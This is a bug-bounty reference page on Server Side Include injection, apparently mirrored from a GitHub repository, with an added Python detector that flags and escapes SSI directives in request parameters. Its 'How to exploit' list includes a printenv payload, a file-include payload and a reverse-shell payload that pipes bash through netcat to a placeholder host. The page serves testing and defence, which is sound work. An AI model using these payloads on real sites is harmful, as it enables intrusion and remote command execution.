mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 18:36:12 +00:00
Server Side Include Injection (SSI Injection)
Introduction
SSI (Server Side Includes) Injection is a web security vulnerability that occurs when a web application allows untrusted user-supplied data to be used as part of a Server Side Include (SSI) directive.
Where to find
It can usually be found anywhere user input is accepted. Try submitting the payload in form fields or GET parameters.
How to exploit
- Print a date
<!--#echo var="DATE_LOCAL" -->
- Print all the variables
<!--#printenv -->
- Include a file
<!--#include file="includefile.html" -->
- Doing a reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->
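From the defending side, the directives listed above share one shape (`<!--#name ... -->`), so they can be flagged in request parameters and made inert before they reach an SSI-parsed page. The following is an added example, not part of the original repository; the function names, the severity split and the sample URLs are assumptions constructed for illustration.

```python
import html
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Shape shared by every directive on this page: <!--#name attributes -->
SSI_RE = re.compile(r"<!--#\s*([a-z]+)\b(.*?)-->", re.IGNORECASE | re.DOTALL)
HIGH_RISK = {"exec", "include"}  # assumed split: command execution / file inclusion

def decode_layers(value, max_rounds=3):
    """Undo repeated URL-encoding so a double-encoded directive is still seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_ssi(value):
    """Return a (directive, severity) pair for each SSI directive in value."""
    hits = []
    for match in SSI_RE.finditer(decode_layers(value)):
        name = match.group(1).lower()
        hits.append((name, "high" if name in HIGH_RISK else "medium"))
    return hits

def scan_request(url):
    """Map each query parameter that carries an SSI directive to its findings."""
    findings = {}
    for key, val in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        hits = find_ssi(val)
        if hits:
            findings[key] = hits
    return findings

def neutralize(value):
    """HTML-encode input so '<!--#' can no longer open a directive."""
    return html.escape(value, quote=True)

# Constructed sample request lines (not real traffic).
SAMPLES = [
    "/search?q=%3C!--%23echo%20var%3D%22DATE_LOCAL%22%20--%3E",
    "/page?name=bob&tpl=%253C!--%2523include%2520file%253D%2522includefile.html%2522%2520--%253E",
    "/search?q=hello+world",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(url, "->", scan_request(url) or "clean")
```

Detection like this is a logging and alerting aid; the fix is to encode or reject user input before it is written into any file the server parses for SSI, or to disable SSI (and `exec` in particular) where it is not needed.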